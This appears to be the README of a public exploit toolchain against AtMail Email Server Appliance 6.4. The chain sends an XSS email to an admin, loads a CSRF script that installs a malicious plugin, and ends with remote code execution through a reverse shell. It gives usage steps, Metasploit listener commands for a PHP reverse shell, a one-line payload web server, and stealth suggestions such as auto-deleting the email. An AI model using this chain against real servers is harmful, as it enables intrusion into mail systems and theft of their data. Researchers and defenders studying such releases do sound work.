Atmail-exploit-toolchain
AtMail Email Server Appliance 6.4 - Exploit toolchain (XSS > CSRF > RCE)
[PacketStorm] [WLB-2020080010]
Disclaimer: this exploit toolchain was inspired by EDB-ID 20009.
Goal
The goal of this exploit toolchain is to replace EDB-ID 20009.
Pros of this toolchain over EDB-ID 20009 exploit:
- Simple to use
- Reusable
- Dynamically generated payloads
- Easily editable / hackable
- Clear code and plugin available
Cons of EDB-ID 20009 exploit:
- Not customizable (static hardcoded payloads)
- Complex to use (many hardcoded values need to be replaced and the code adapted to suit the target environment)
- Oneshot use (all values hardcoded)
- The plugin archive (tgz) is embedded as a string of hex chars, so the plugin source code can't be easily read or modified
Requirements
- (Optional) Metasploit Framework (msfvenom for reverse shell generation)
- tar (to generate the plugin archive)
- ruby (payloads preparation and XSS SMTP delivery)
- (Optional) A web server to deliver the XSS payload
- Knowing an Atmail admin email address (only admins can install a plugin)
- Passive interaction (the admin needs to open the email containing the XSS payload in the WebMail and to have a valid administration interface session running at the same time)
Install requirements on ArchLinux:
$ sudo pacman -S metasploit tar ruby
How it works
- An email containing an XSS payload is sent to the admin
- The XSS payload remotely loads the JavaScript CSRF
- The CSRF installs a plugin
- Once installed, the plugin executes a system command: the reverse shell
Exploit files:
- config.yml: contains the toolchain configuration
- exploit.sh: the exploit wrapper that needs to be executed
- xss_mail.rb: sends the email containing the XSS to the admin via the Atmail SMTP server (unauthenticated)
- csrf_prepare.rb: prepares the CSRF payload (setting the target and encoding the plugin archive)
- rce_prepare.rb: prepares the RCE (generating the reverse shell and creating the plugin archive)
- csrf_plugin.js: the prepared CSRF payload
- noraj/: folder containing the uncompressed plugin architecture
Usage
The exploit toolchain requires only 2 manual steps:
- Edit config.yml
- Launch exploit.sh
But before launching the attack, a web server needs to deliver the JavaScript CSRF file and a reverse shell listener needs to be waiting for the connection. So the attack looks more like:
- Edit config.yml
- Start an HTTP server that will deliver csrf_plugin.js
- Start the reverse shell listener
- Launch exploit.sh
Example of a one-line HTTP server:
$ ruby -run -e httpd . -p 8000
Example of a reverse shell listener:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/reverse_php
payload => php/reverse_php
msf5 exploit(multi/handler) > set LHOST 1.1.1.1
LHOST => 1.1.1.1
msf5 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf5 exploit(multi/handler) > run
Notes
- The RCE occurs only when the plugin is installed: if the reverse shell connection is lost, re-executing means re-installing the plugin, so the admin only needs to reload his mailbox.
- Red teamers could enhance the exploit to auto-remove the email once read and to remove the plugin once the reverse shell connection is established: less persistent but stealthier.
- msfvenom (MSF 5.0) only supports an IP address for LHOST, not a domain.
- As said in Requirements, the admin needs to be connected to both the Webmail and the administration interface.
- Tested with ruby 2.7.